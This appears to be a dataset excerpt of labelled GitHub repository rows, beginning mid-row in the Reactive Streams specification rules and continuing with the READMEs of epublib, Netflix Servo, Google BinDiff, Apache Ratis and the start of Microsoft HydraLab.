onError(Throwable t); - public void onComplete(); -} -```` - -| ID | Rule | -| ------------------------- | ------------------------------------------------------------------------------------------------------ | -| 1 | A `Subscriber` MUST signal demand via `Subscription.request(long n)` to receive `onNext` signals. | -| [:bulb:](#2.1 ""2.1 explained"") | *The intent of this rule is to establish that it is the responsibility of the Subscriber to decide when and how many elements it is able and willing to receive. To avoid signal reordering caused by reentrant Subscription methods, it is strongly RECOMMENDED for synchronous Subscriber implementations to invoke Subscription methods at the very end of any signal processing. It is RECOMMENDED that Subscribers request the upper limit of what they are able to process, as requesting only one element at a time results in an inherently inefficient ""stop-and-wait"" protocol.* | -| 2 | If a `Subscriber` suspects that its processing of signals will negatively impact its `Publisher`´s responsivity, it is RECOMMENDED that it asynchronously dispatches its signals. | -| [:bulb:](#2.2 ""2.2 explained"") | *The intent of this rule is that a Subscriber should [not obstruct](#term_non-obstructing) the progress of the Publisher from an execution point-of-view. In other words, the Subscriber should not starve the Publisher from receiving CPU cycles.* | -| 3 | `Subscriber.onComplete()` and `Subscriber.onError(Throwable t)` MUST NOT call any methods on the `Subscription` or the `Publisher`. | -| [:bulb:](#2.3 ""2.3 explained"") | *The intent of this rule is to prevent cycles and race-conditions—between Publisher, Subscription and Subscriber—during the processing of completion signals.* | -| 4 | `Subscriber.onComplete()` and `Subscriber.onError(Throwable t)` MUST consider the Subscription cancelled after having received the signal. | -| [:bulb:](#2.4 ""2.4 explained"") | *The intent of this rule is to make sure that Subscribers respect a Publisher’s [terminal state](#term_terminal_state) signals. A Subscription is simply not valid anymore after an onComplete or onError signal has been received.* | -| 5 | A `Subscriber` MUST call `Subscription.cancel()` on the given `Subscription` after an `onSubscribe` signal if it already has an active `Subscription`. | -| [:bulb:](#2.5 ""2.5 explained"") | *The intent of this rule is to prevent that two, or more, separate Publishers from trying to interact with the same Subscriber. Enforcing this rule means that resource leaks are prevented since extra Subscriptions will be cancelled. Failure to conform to this rule may lead to violations of Publisher rule 1, amongst others. Such violations can lead to hard-to-diagnose bugs.* | -| 6 | A `Subscriber` MUST call `Subscription.cancel()` if the `Subscription` is no longer needed. | -| [:bulb:](#2.6 ""2.6 explained"") | *The intent of this rule is to establish that Subscribers cannot just throw Subscriptions away when they are no longer needed, they have to call `cancel` so that resources held by that Subscription can be safely, and timely, reclaimed. An example of this would be a Subscriber which is only interested in a specific element, which would then cancel its Subscription to signal its completion to the Publisher.* | -| 7 | A Subscriber MUST ensure that all calls on its Subscription's request and cancel methods are performed [serially](#term_serially). | -| [:bulb:](#2.7 ""2.7 explained"") | *The intent of this rule is to permit the calling of the request and cancel methods (including from multiple threads) if and only if a [serial](#term_serially) relation between each of the calls is established.* | -| 8 | A `Subscriber` MUST be prepared to receive one or more `onNext` signals after having called `Subscription.cancel()` if there are still requested elements pending [see [3.12](#3.12)]. `Subscription.cancel()` does not guarantee to perform the underlying cleaning operations immediately. | -| [:bulb:](#2.8 ""2.8 explained"") | *The intent of this rule is to highlight that there may be a delay between calling `cancel` and the Publisher observing that cancellation.* | -| 9 | A `Subscriber` MUST be prepared to receive an `onComplete` signal with or without a preceding `Subscription.request(long n)` call. | -| [:bulb:](#2.9 ""2.9 explained"") | *The intent of this rule is to establish that completion is unrelated to the demand flow—this allows for streams which complete early, and obviates the need to *poll* for completion.* | -| 10 | A `Subscriber` MUST be prepared to receive an `onError` signal with or without a preceding `Subscription.request(long n)` call. | -| [:bulb:](#2.10 ""2.10 explained"") | *The intent of this rule is to establish that Publisher failures may be completely unrelated to signalled demand. This means that Subscribers do not need to poll to find out if the Publisher will not be able to fulfill its requests.* | -| 11 | A `Subscriber` MUST make sure that all calls on its [signal](#term_signal) methods happen-before the processing of the respective signals. I.e. the Subscriber must take care of properly publishing the signal to its processing logic. | -| [:bulb:](#2.11 ""2.11 explained"") | *The intent of this rule is to establish that it is the responsibility of the Subscriber implementation to make sure that asynchronous processing of its signals are thread safe. See [JMM definition of Happens-Before in section 17.4.5](https://docs.oracle.com/javase/specs/jls/se8/html/jls-17.html#jls-17.4.5).* | -| 12 | `Subscriber.onSubscribe` MUST be called at most once for a given `Subscriber` (based on object equality). | -| [:bulb:](#2.12 ""2.12 explained"") | *The intent of this rule is to establish that it MUST be assumed that the same Subscriber can only be subscribed at most once. Note that `object equality` is `a.equals(b)`.* | -| 13 | Calling `onSubscribe`, `onNext`, `onError` or `onComplete` MUST [return normally](#term_return_normally) except when any provided parameter is `null` in which case it MUST throw a `java.lang.NullPointerException` to the caller, for all other situations the only legal way for a `Subscriber` to signal failure is by cancelling its `Subscription`. In the case that this rule is violated, any associated `Subscription` to the `Subscriber` MUST be considered as cancelled, and the caller MUST raise this error condition in a fashion that is adequate for the runtime environment. | -| [:bulb:](#2.13 ""2.13 explained"") | *The intent of this rule is to establish the semantics for the methods of Subscriber and what the Publisher is allowed to do in which case this rule is violated. «Raise this error condition in a fashion that is adequate for the runtime environment» could mean logging the error—or otherwise make someone or something aware of the situation—as the error cannot be signalled to the faulty Subscriber.* | - -#### 3. Subscription ([Code](https://github.com/reactive-streams/reactive-streams-jvm/blob/v1.0.4/api/src/main/java/org/reactivestreams/Subscription.java)) - -```java -public interface Subscription { - public void request(long n); - public void cancel(); -} -```` - -| ID | Rule | -| ------------------------- | ------------------------------------------------------------------------------------------------------ | -| 1 | `Subscription.request` and `Subscription.cancel` MUST only be called inside of its `Subscriber` context. | -| [:bulb:](#3.1 ""3.1 explained"") | *The intent of this rule is to establish that a Subscription represents the unique relationship between a Subscriber and a Publisher [see [2.12](#2.12)]. The Subscriber is in control over when elements are requested and when more elements are no longer needed.* | -| 2 | The `Subscription` MUST allow the `Subscriber` to call `Subscription.request` synchronously from within `onNext` or `onSubscribe`. | -| [:bulb:](#3.2 ""3.2 explained"") | *The intent of this rule is to make it clear that implementations of `request` must be reentrant, to avoid stack overflows in the case of mutual recursion between `request` and `onNext` (and eventually `onComplete` / `onError`). This implies that Publishers can be `synchronous`, i.e. signalling `onNext`´s on the thread which calls `request`.* | -| 3 | `Subscription.request` MUST place an upper bound on possible synchronous recursion between `Publisher` and `Subscriber`. | -| [:bulb:](#3.3 ""3.3 explained"") | *The intent of this rule is to complement [see [3.2](#3.2)] by placing an upper limit on the mutual recursion between `request` and `onNext` (and eventually `onComplete` / `onError`). Implementations are RECOMMENDED to limit this mutual recursion to a depth of `1` (ONE)—for the sake of conserving stack space. An example for undesirable synchronous, open recursion would be Subscriber.onNext -> Subscription.request -> Subscriber.onNext -> …, as it otherwise will result in blowing the calling thread´s stack.* | -| 4 | `Subscription.request` SHOULD respect the responsivity of its caller by returning in a timely manner. | -| [:bulb:](#3.4 ""3.4 explained"") | *The intent of this rule is to establish that `request` is intended to be a [non-obstructing](#term_non-obstructing) method, and should be as quick to execute as possible on the calling thread, so avoid heavy computations and other things that would stall the caller´s thread of execution.* | -| 5 | `Subscription.cancel` MUST respect the responsivity of its caller by returning in a timely manner, MUST be idempotent and MUST be [thread-safe](#term_thread-safe). | -| [:bulb:](#3.5 ""3.5 explained"") | *The intent of this rule is to establish that `cancel` is intended to be a [non-obstructing](#term_non-obstructing) method, and should be as quick to execute as possible on the calling thread, so avoid heavy computations and other things that would stall the caller´s thread of execution. Furthermore, it is also important that it is possible to call it multiple times without any adverse effects.* | -| 6 | After the `Subscription` is cancelled, additional `Subscription.request(long n)` MUST be [NOPs](#term_nop). | -| [:bulb:](#3.6 ""3.6 explained"") | *The intent of this rule is to establish a causal relationship between cancellation of a subscription and the subsequent non-operation of requesting more elements.* | -| 7 | After the `Subscription` is cancelled, additional `Subscription.cancel()` MUST be [NOPs](#term_nop). | -| [:bulb:](#3.7 ""3.7 explained"") | *The intent of this rule is superseded by [3.5](#3.5).* | -| 8 | While the `Subscription` is not cancelled, `Subscription.request(long n)` MUST register the given number of additional elements to be produced to the respective subscriber. | -| [:bulb:](#3.8 ""3.8 explained"") | *The intent of this rule is to make sure that `request`-ing is an additive operation, as well as ensuring that a request for elements is delivered to the Publisher.* | -| 9 | While the `Subscription` is not cancelled, `Subscription.request(long n)` MUST signal `onError` with a `java.lang.IllegalArgumentException` if the argument is <= 0. The cause message SHOULD explain that non-positive request signals are illegal. | -| [:bulb:](#3.9 ""3.9 explained"") | *The intent of this rule is to prevent faulty implementations to proceed operation without any exceptions being raised. Requesting a negative or 0 number of elements, since requests are additive, most likely to be the result of an erroneous calculation on the behalf of the Subscriber.* | -| 10 | While the `Subscription` is not cancelled, `Subscription.request(long n)` MAY synchronously call `onNext` on this (or other) subscriber(s). | -| [:bulb:](#3.10 ""3.10 explained"") | *The intent of this rule is to establish that it is allowed to create synchronous Publishers, i.e. Publishers who execute their logic on the calling thread.* | -| 11 | While the `Subscription` is not cancelled, `Subscription.request(long n)` MAY synchronously call `onComplete` or `onError` on this (or other) subscriber(s). | -| [:bulb:](#3.11 ""3.11 explained"") | *The intent of this rule is to establish that it is allowed to create synchronous Publishers, i.e. Publishers who execute their logic on the calling thread.* | -| 12 | While the `Subscription` is not cancelled, `Subscription.cancel()` MUST request the `Publisher` to eventually stop signaling its `Subscriber`. The operation is NOT REQUIRED to affect the `Subscription` immediately. | -| [:bulb:](#3.12 ""3.12 explained"") | *The intent of this rule is to establish that the desire to cancel a Subscription is eventually respected by the Publisher, acknowledging that it may take some time before the signal is received.* | -| 13 | While the `Subscription` is not cancelled, `Subscription.cancel()` MUST request the `Publisher` to eventually drop any references to the corresponding subscriber. | -| [:bulb:](#3.13 ""3.13 explained"") | *The intent of this rule is to make sure that Subscribers can be properly garbage-collected after their subscription no longer being valid. Re-subscribing with the same Subscriber object is discouraged [see [2.12](#2.12)], but this specification does not mandate that it is disallowed since that would mean having to store previously cancelled subscriptions indefinitely.* | -| 14 | While the `Subscription` is not cancelled, calling `Subscription.cancel` MAY cause the `Publisher`, if stateful, to transition into the `shut-down` state if no other `Subscription` exists at this point [see [1.9](#1.9)]. | -| [:bulb:](#3.14 ""3.14 explained"") | *The intent of this rule is to allow for Publishers to signal `onComplete` or `onError` following `onSubscribe` for new Subscribers in response to a cancellation signal from an existing Subscriber.* | -| 15 | Calling `Subscription.cancel` MUST [return normally](#term_return_normally). | -| [:bulb:](#3.15 ""3.15 explained"") | *The intent of this rule is to disallow implementations to throw exceptions in response to `cancel` being called.* | -| 16 | Calling `Subscription.request` MUST [return normally](#term_return_normally). | -| [:bulb:](#3.16 ""3.16 explained"") | *The intent of this rule is to disallow implementations to throw exceptions in response to `request` being called.* | -| 17 | A `Subscription` MUST support an unbounded number of calls to `request` and MUST support a demand up to 2^63-1 (`java.lang.Long.MAX_VALUE`). A demand equal or greater than 2^63-1 (`java.lang.Long.MAX_VALUE`) MAY be considered by the `Publisher` as “effectively unbounded”. | -| [:bulb:](#3.17 ""3.17 explained"") | *The intent of this rule is to establish that the Subscriber can request an unbounded number of elements, in any increment above 0 [see [3.9](#3.9)], in any number of invocations of `request`. As it is not feasibly reachable with current or foreseen hardware within a reasonable amount of time (1 element per nanosecond would take 292 years) to fulfill a demand of 2^63-1, it is allowed for a Publisher to stop tracking demand beyond this point.* | - -A `Subscription` is shared by exactly one `Publisher` and one `Subscriber` for the purpose of mediating the data exchange between this pair. This is the reason why the `subscribe()` method does not return the created `Subscription`, but instead returns `void`; the `Subscription` is only passed to the `Subscriber` via the `onSubscribe` callback. - -#### 4.Processor ([Code](https://github.com/reactive-streams/reactive-streams-jvm/blob/v1.0.4/api/src/main/java/org/reactivestreams/Processor.java)) - -```java -public interface Processor extends Subscriber, Publisher { -} -```` - -| ID | Rule | -| ------------------------ | ------------------------------------------------------------------------------------------------------ | -| 1 | A `Processor` represents a processing stage—which is both a `Subscriber` and a `Publisher` and MUST obey the contracts of both. | -| [:bulb:](#4.1 ""4.1 explained"") | *The intent of this rule is to establish that Processors behave, and are bound by, both the Publisher and Subscriber specifications.* | -| 2 | A `Processor` MAY choose to recover an `onError` signal. If it chooses to do so, it MUST consider the `Subscription` cancelled, otherwise it MUST propagate the `onError` signal to its Subscribers immediately. | -| [:bulb:](#4.2 ""4.2 explained"") | *The intent of this rule is to inform that it’s possible for implementations to be more than simple transformations.* | - -While not mandated, it can be a good idea to cancel a `Processor`´s upstream `Subscription` when/if its last `Subscriber` cancels their `Subscription`, -to let the cancellation signal propagate upstream. - -### Asynchronous vs Synchronous Processing ### - -The Reactive Streams API prescribes that all processing of elements (`onNext`) or termination signals (`onError`, `onComplete`) MUST NOT *block* the `Publisher`. However, each of the `on*` handlers can process the events synchronously or asynchronously. - -Take this example: - -``` -nioSelectorThreadOrigin map(f) filter(p) consumeTo(toNioSelectorOutput) -``` - -It has an async origin and an async destination. Let’s assume that both origin and destination are selector event loops. The `Subscription.request(n)` must be chained from the destination to the origin. This is now where each implementation can choose how to do this. - -The following uses the pipe `|` character to signal async boundaries (queue and schedule) and `R#` to represent resources (possibly threads). - -``` -nioSelectorThreadOrigin | map(f) | filter(p) | consumeTo(toNioSelectorOutput) --------------- R1 ---- | - R2 - | -- R3 --- | ---------- R4 ---------------- -``` - -In this example each of the 3 consumers, `map`, `filter` and `consumeTo` asynchronously schedule the work. It could be on the same event loop (trampoline), separate threads, whatever. - -``` -nioSelectorThreadOrigin map(f) filter(p) | consumeTo(toNioSelectorOutput) -------------------- R1 ----------------- | ---------- R2 ---------------- -``` - -Here it is only the final step that asynchronously schedules, by adding work to the NioSelectorOutput event loop. The `map` and `filter` steps are synchronously performed on the origin thread. - -Or another implementation could fuse the operations to the final consumer: - -``` -nioSelectorThreadOrigin | map(f) filter(p) consumeTo(toNioSelectorOutput) ---------- R1 ---------- | ------------------ R2 ------------------------- -``` - -All of these variants are ""asynchronous streams"". They all have their place and each has different tradeoffs including performance and implementation complexity. - -The Reactive Streams contract allows implementations the flexibility to manage resources and scheduling and mix asynchronous and synchronous processing within the bounds of a non-blocking, asynchronous, dynamic push-pull stream. - -In order to allow fully asynchronous implementations of all participating API elements—`Publisher`/`Subscription`/`Subscriber`/`Processor`—all methods defined by these interfaces return `void`. - -### Subscriber controlled queue bounds ### - -One of the underlying design principles is that all buffer sizes are to be bounded and these bounds must be *known* and *controlled* by the subscribers. These bounds are expressed in terms of *element count* (which in turn translates to the invocation count of onNext). Any implementation that aims to support infinite streams (especially high output rate streams) needs to enforce bounds all along the way to avoid out-of-memory errors and constrain resource usage in general. - -Since back-pressure is mandatory the use of unbounded buffers can be avoided. In general, the only time when a queue might grow without bounds is when the publisher side maintains a higher rate than the subscriber for an extended period of time, but this scenario is handled by backpressure instead. - -Queue bounds can be controlled by a subscriber signaling demand for the appropriate number of elements. At any point in time the subscriber knows: - - - the total number of elements requested: `P` - - the number of elements that have been processed: `N` - -Then the maximum number of elements that may arrive—until more demand is signaled to the Publisher—is `P - N`. In the case that the subscriber also knows the number of elements B in its input buffer then this bound can be refined to `P - B - N`. - -These bounds must be respected by a publisher independent of whether the source it represents can be backpressured or not. In the case of sources whose production rate cannot be influenced—for example clock ticks or mouse movement—the publisher must choose to either buffer or drop elements to obey the imposed bounds. - -Subscribers signaling a demand for one element after the reception of an element effectively implement a Stop-and-Wait protocol where the demand signal is equivalent to acknowledgement. By providing demand for multiple elements the cost of acknowledgement is amortized. It is worth noting that the subscriber is allowed to signal demand at any point in time, allowing it to avoid unnecessary delays between the publisher and the subscriber (i.e. keeping its input buffer filled without having to wait for full round-trips). - -## Legal - -This project is a collaboration between engineers from Kaazing, Lightbend, Netflix, Pivotal, Red Hat, Twitter and many others. This project is licensed under MIT No Attribution (SPDX: MIT-0). -",0 -psiegman/epublib,a java library for reading and writing epub files,2009-11-18T09:37:52Z,,"# epublib -Epublib is a java library for reading/writing/manipulating epub files. - -It consists of 2 parts: a core that reads/writes epub and a collection of tools. -The tools contain an epub cleanup tool, a tool to create epubs from html files, a tool to create an epub from an uncompress html file. -It also contains a swing-based epub viewer. -![Epublib viewer](http://www.siegmann.nl/wp-content/uploads/Alice%E2%80%99s-Adventures-in-Wonderland_2011-01-30_18-17-30.png) - -The core runs both on android and a standard java environment. The tools run only on a standard java environment. - -This means that reading/writing epub files works on Android. - -## Build status -* Travis Build Status: [![Build Status](https://travis-ci.org/psiegman/epublib.svg?branch=master)](https://travis-ci.org/psiegman/epublib) - -## Command line examples - -Set the author of an existing epub - java -jar epublib-3.0-SNAPSHOT.one-jar.jar --in input.epub --out result.epub --author Tester,Joe - -Set the cover image of an existing epub - java -jar epublib-3.0-SNAPSHOT.one-jar.jar --in input.epub --out result.epub --cover-image my_cover.jpg - -## Creating an epub programmatically - - package nl.siegmann.epublib.examples; - - import java.io.InputStream; - import java.io.FileOutputStream; - - import nl.siegmann.epublib.domain.Author; - import nl.siegmann.epublib.domain.Book; - import nl.siegmann.epublib.domain.Metadata; - import nl.siegmann.epublib.domain.Resource; - import nl.siegmann.epublib.domain.TOCReference; - - import nl.siegmann.epublib.epub.EpubWriter; - - public class Translator { - private static InputStream getResource( String path ) { - return Translator.class.getResourceAsStream( path ); - } - - private static Resource getResource( String path, String href ) { - return new Resource( getResource( path ), href ); - } - - public static void main(String[] args) { - try { - // Create new Book - Book book = new Book(); - Metadata metadata = book.getMetadata(); - - // Set the title - metadata.addTitle(""Epublib test book 1""); - - // Add an Author - metadata.addAuthor(new Author(""Joe"", ""Tester"")); - - // Set cover image - book.setCoverImage( - getResource(""/book1/test_cover.png"", ""cover.png"") ); - - // Add Chapter 1 - book.addSection(""Introduction"", - getResource(""/book1/chapter1.html"", ""chapter1.html"") ); - - // Add css file - book.getResources().add( - getResource(""/book1/book1.css"", ""book1.css"") ); - - // Add Chapter 2 - TOCReference chapter2 = book.addSection( ""Second Chapter"", - getResource(""/book1/chapter2.html"", ""chapter2.html"") ); - - // Add image used by Chapter 2 - book.getResources().add( - getResource(""/book1/flowers_320x240.jpg"", ""flowers.jpg"")); - - // Add Chapter2, Section 1 - book.addSection(chapter2, ""Chapter 2, section 1"", - getResource(""/book1/chapter2_1.html"", ""chapter2_1.html"")); - - // Add Chapter 3 - book.addSection(""Conclusion"", - getResource(""/book1/chapter3.html"", ""chapter3.html"")); - - // Create EpubWriter - EpubWriter epubWriter = new EpubWriter(); - - // Write the Book as Epub - epubWriter.write(book, new FileOutputStream(""test1_book1.epub"")); - } catch (Exception e) { - e.printStackTrace(); - } - } - } - - -## Usage in Android - -Add the following lines to your `app` module's `build.gradle` file: - - repositories { - maven { - url 'https://github.com/psiegman/mvn-repo/raw/master/releases' - } - } - - dependencies { - implementation('nl.siegmann.epublib:epublib-core:4.0') { - exclude group: 'org.slf4j' - exclude group: 'xmlpull' - } - implementation 'org.slf4j:slf4j-android:1.7.25' - } -",0 -Netflix/servo,Netflix Application Monitoring Library,2011-12-16T21:09:27Z,,"# DEPRECATED - -This project receives minimal maintenance to keep software that relies on it working. There -is no active development or planned feature improvement. For any new projects it is recommended -to use the [Spectator] library instead. - -For more details see the [Servo comparison] page in the Spectator docs. - -[Spectator]: https://github.com/Netflix/spectator -[Servo comparison]: http://netflix.github.io/spectator/en/latest/intro/servo-comparison/ - -# No-Op Registry - -As of version 0.13.0, the default monitor registry is a no-op implementation to minimize -the overhead for legacy apps that still happen to have some usage of Servo. If the previous -behavior is needed, then set the following system property: - -``` -com.netflix.servo.DefaultMonitorRegistry.registryClass=com.netflix.servo.jmx.JmxMonitorRegistry -``` - -# Servo: Application Metrics in Java - -> servo v. : WATCH OVER, OBSERVE - ->Latin. - -Servo provides a simple interface for exposing and publishing application metrics in Java. The primary goals are: - -* **Leverage JMX**: JMX is the standard monitoring interface for Java and can be queried by many existing tools. -* **Keep It Simple**: It should be trivial to expose metrics and publish metrics without having to write lots of code such as [MBean interfaces](http://docs.oracle.com/javase/tutorial/jmx/mbeans/standard.html). -* **Flexible Publishing**: Once metrics are exposed, it should be easy to regularly poll the metrics and make them available for internal reporting systems, logs, and services like [Amazon CloudWatch](http://aws.amazon.com/cloudwatch/). - -This has already been implemented inside of Netflix and most of our applications currently use it. - -## Project Details - -### Build Status - -[![Build Status](https://travis-ci.org/Netflix/servo.svg)](https://travis-ci.org/Netflix/servo/builds) - -### Versioning - -Servo is released with a 0.X.Y version because it has not yet reached full API stability. - -Given a version number MAJOR.MINOR.PATCH, increment the: - -* MINOR version when there are binary incompatible changes, and -* PATCH version when new functionality or bug fixes are backwards compatible. - -### Documentation - - * [GitHub Wiki](https://github.com/Netflix/servo/wiki) - * [Javadoc](http://netflix.github.io/servo/current/servo-core/docs/javadoc/) - -### Communication - -* Google Group: [Netflix Atlas](https://groups.google.com/forum/#!forum/netflix-atlas) -* For bugs, feedback, questions and discussion please use [GitHub Issues](https://github.com/Netflix/servo/issues). -* If you want to help contribute to the project, see [CONTRIBUTING.md](https://github.com/Netflix/servo/blob/master/CONTRIBUTING.md) for details. - - -## Project Usage - -### Build - -To build the Servo project: - -``` -$ git clone https://github.com/Netflix/servo.git -$ cd servo -$ ./gradlew build -``` - -More details can be found on the [Getting Started](https://github.com/Netflix/servo/wiki/Getting-Started) page of the wiki. - -### Binaries - -Binaries and dependency information can be found at [Maven Central](http://search.maven.org/#search%7Cga%7C1%7Ccom.netflix.servo). - -Maven Example: - -``` - - com.netflix.servo - servo-core - 0.12.7 - -``` - -Ivy Example: - -``` - -``` - -## License - -Copyright 2012-2016 Netflix, Inc. - -Licensed under the Apache License, Version 2.0 (the ""License""); -you may not use this file except in compliance with the License. -You may obtain a copy of the License at: - -http://www.apache.org/licenses/LICENSE-2.0 - -Unless required by applicable law or agreed to in writing, software -distributed under the License is distributed on an ""AS IS"" BASIS, -WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -See the License for the specific language governing permissions and -limitations under the License. -",0 -google/bindiff,Quickly find differences and similarities in disassembled code,2023-09-20T06:41:55Z,,"![BinDiff Logo](docs/images/bindiff-lockup-vertical.png) - -Copyright 2011-2024 Google LLC. - -# BinDiff - -This repository contains the BinDiff source code. BinDiff is an open-source -comparison tool for binary files to quickly find differences and similarities -in disassembled code. - -## Table of Contents - -- [About BinDiff](#about-bindiff) -- [Quickstart](#quickstart) -- [Documentation](#documentation) -- [Codemap](#codemap) -- [Building from Source](#building-from-source) -- [License](#license) -- [Getting Involved](#getting-involved) - -## About BinDiff - -BinDiff is an open-source comparison tool for binary files, that assists -vulnerability researchers and engineers to quickly find differences and -similarities in disassembled code. - -With BinDiff, researchers can identify and isolate fixes for vulnerabilities in -vendor-supplied patches. It can also be used to port symbols and comments -between disassemblies of multiple versions of the same binary. This makes -tracking changes over time easier and allows organizations to retain analysis -results and enables knowledge transfer among binary analysts. - -### Use Cases - -* Compare binary files for x86, MIPS, ARM, PowerPC, and other architectures - supported by popular [disassemblers](docs/disassemblers.md). -* Identify identical and similar functions in different binaries -* Port function names, comments and local names from one disassembly to the - other -* Detect and highlight changes between two variants of the same function - -## Quickstart - -If you want to just get started using BinDiff, download prebuilt installation -packages from the -[releases page](https://github.com/google/bindiff/releases). - -Note: BinDiff relies on a separate disassembler. Out of the box, it ships with -support for IDA Pro, Binary Ninja and Ghidra. The [disassemblers page](docs/disassemblers.md) lists the supported configurations. - -## Documentation - -A subset of the existing [manual](https://www.zynamics.com/bindiff/manual) is -available in the [`docs/` directory](docs/README.md). - -## Codemap - -BinDiff contains the following components: - -* [`cmake`](cmake) - CMake build files declaring external dependencies -* [`fixtures`](fixtures) - A collection of test files to exercise the BinDiff - core engine -* [`ida`](ida) - Integration with the IDA Pro disassembler -* [`java`](java) - Java source code. This contains the the BinDiff visual diff - user interface and its corresponding utility library. -* [`match`](match) - Matching algorithms for the BinDiff core engine -* [`packaging`](packaging) - Package sources for the installation packages -* [`tools`](tools) - Helper executables that are shipped with the product - -## Building from Source - -The instruction below should be enough to build both the native code and the -Java based components. - -More detailed build instructions will be added at a later date. This includes -ready-made `Dockerfile`s and scripts for building the installation packages. - -### Native code - -BinDiff uses CMake to generate its build files for those components that consist -of native C++ code. - -The following build dependencies are required: - -* [BinExport](https://github.com/google/binexport) 12, the companion plugin - to BinDiff that also contains a lot of shared code -* Boost 1.71.0 or higher (a partial copy of 1.71.0 ships with BinExport and - will be used automatically) -* [CMake](https://cmake.org/download/) 3.14 or higher -* [Ninja](https://ninja-build.org/) for speedy builds -* GCC 9 or a recent version of Clang on Linux/macOS. On Windows, use the - Visual Studio 2019 compiler and the Windows SDK for Windows 10. -* Git 1.8 or higher -* Dependencies that will be downloaded: - * Abseil, GoogleTest, Protocol Buffers (3.14), and SQLite3 - * Binary Ninja SDK - -The following build dependencies are optional: -* IDA Pro only: IDA SDK 8.0 or higher (unpack into `deps/idasdk`) - -The general build steps are the same on Windows, Linux and macOS. The following -shows the commands for Linux. - -Download dependencies that won't be downloaded automatically: - -```bash -mkdir -p build/out -git clone https://github.com/google/binexport build/binexport -unzip -q -d build/idasdk -``` - -Next, configure the build directory and generate build files: - -```bash -cmake -S . -B build/out -G Ninja \ - -DCMAKE_BUILD_TYPE=Release \ - -DCMAKE_INSTALL_PREFIX=build/out \ - -DBINDIFF_BINEXPORT_DIR=build/binexport \ - ""-DIdaSdk_ROOT_DIR=${PWD}build/idasdk"" -``` - -Finally, invoke the actual build. Binaries will be placed in -`build/out/bindiff-prefix`: - -```bash -cmake --build build/out --config Release -(cd build/out; ctest --build-config Release --output-on-failure) -cmake --install build/out --config Release -``` - -### Building without IDA - -To build without IDA, simply change the above configuration step to - -```bash -cmake -S . -B build/out -G Ninja \ - -DCMAKE_BUILD_TYPE=Release \ - -DCMAKE_INSTALL_PREFIX=build/out \ - -DBINDIFF_BINEXPORT_DIR=build/binexport \ - -DBINEXPORT_ENABLE_IDAPRO=OFF -``` - -### Java GUI and yFiles - -Building the Java based GUI requires the commercial third-party graph -visualisation library [yFiles](https://www.yworks.com/products/yfiles) for graph -display and layout. This library is immensely powerful, and not easily -replaceable. - -To build, BinDiff uses Gradle 6.x and Java 11 LTS. Refer to its -[installation guide](https://docs.gradle.org/6.8.3/userguide/installation.html) -for instructions on how to install. - -Assuming you are a yFiles license holder, set the `YFILES_DIR` environment -variable to a directory containing the yFiles `y.jar` and `ysvg.jar`. - -Note: BinDiff still uses the older 2.x branch of yFiles. - -Then invoke Gradle to download external dependencies and build: - -Windows: -``` -set YFILES_DIR= -cd java -gradle shadowJar -``` - -Linux or macOS: - -``` -export YFILES_DIR= -cd java -gradle shadowJar -``` - -Afterwards the directory `ui/build/libs` in the `java` sub-directory should -contain the self-contained `bindiff-ui-all.jar` artifact, which can be run -using the standard `java -jar` command. - -## Further reading / Similar tools - -The original papers outlining the general ideas behind BinDiff: - -* Thomas Dullien and Rolf Rolles. *Graph-Based Comparison of Executable - Objects*. [bindiffsstic05-1.pdf](docs/papers/bindiffsstic05-1.pdf). - SSTIC ’05, Symposium sur la Sécurité des Technologies de l’Information et des - Communications. 2005. -* Halvar Flake. *Structural Comparison of Executable Objects*. - [dimva_paper2.pdf](docs/papers/dimva_paper2.pdf). pp 161-173. Detection of - Intrusions and Malware & Vulnerability Assessment. 2004.3-88579-375-X. - -Other tools in the same problem space: - -* [Diaphora](https://github.com/joxeankoret/diaphora), an advanced program - diffing tool implementing many of the same ideas. -* [TurboDiff](https://www.coresecurity.com/core-labs/open-source-tools/turbodiff-cs), a now-defunct program diffing plugin for IDA Pro. - -Projects using BinDiff: - -* [VxSig](https://github.com/google/vxsig), a tool to automatically generate - AV byte signatures from sets of similar binaries. - -## License - -BinDiff is licensed under the terms of the Apache license. See -[LICENSE](LICENSE) for more information. - -## Getting Involved - -If you want to contribute, please read [CONTRIBUTING.md](CONTRIBUTING.md) -before sending pull requests. You can also report bugs or file feature -requests. -",0 -apache/ratis,Open source Java implementation for Raft consensus protocol.,2017-01-31T08:00:07Z,," - -# Apache Ratis -*[Apache Ratis]* is a Java library that implements the Raft protocol [1], -where an extended version of the Raft paper is available at . -The paper introduces Raft and states its motivations in following words: - -> Raft is a consensus algorithm for managing a replicated log. -> It produces a result equivalent to (multi-)Paxos, and it is as efficient as Paxos, -> but its structure is different from Paxos; this makes Raft more understandable than Paxos -> and also provides a better foundation for building practical systems. - -Ratis aims to make Raft available as a java library that can be used by any system that needs to use a replicated log. -It provides pluggability for state machine implementations to manage replicated states. -It also provides pluggability for Raft log, rpc implementations and metric implementations to make it easy for integration with other projects. -Another important goal is to support high throughput data ingest so that it can be used for more general data replication use cases. - -* To build the artifacts, see [BUILDING.md](BUILDING.md). -* To run the examples, see [ratis-examples/README.md](ratis-examples/README.md). - -## Reference -1. Diego Ongaro and John Ousterhout, -_[In Search of an Understandable Consensus Algorithm][Ongaro2014]_, -2014 USENIX Annual Technical Conference (USENIX ATC 14) (Philadelphia, PA), USENIX Association, 2014, pp. 305-319. - -[Ongaro2014]: https://www.usenix.org/conference/atc14/technical-sessions/presentation/ongaro - -[Apache Ratis]: https://ratis.apache.org/ -",0 -microsoft/HydraLab,Intelligent cloud testing made easy.,2022-04-28T09:18:16Z,,"

Hydra Lab

-

Build your own cloud testing infrastructure

-
- -[中文(完善中)](README.zh-CN.md) - -[![Build Status](https://dlwteam.visualstudio.com/Next/_apis/build/status/HydraLab-CI?branchName=main)](https://dlwteam.visualstudio.com/Next/_build/latest?definitionId=743&branchName=main) -![Spring Boot](https://img.shields.io/badge/Spring%20Boot-v2.2.5-blue) -![Appium](https://img.shields.io/badge/Appium-v8.0.0-yellow) -![License](https://img.shields.io/badge/license-MIT-green) - ---- - -https://github.com/microsoft/HydraLab/assets/8344245/cefefe24-4e11-4cc7-a3af-70cb44974735 - -[What is Hydra Lab?](#what-is) | [Get Started](#get-started) | [Contribute](#contribute) | [Contact Us](#contact) | [Wiki](https://github.com/microsoft/HydraLab/wiki) -
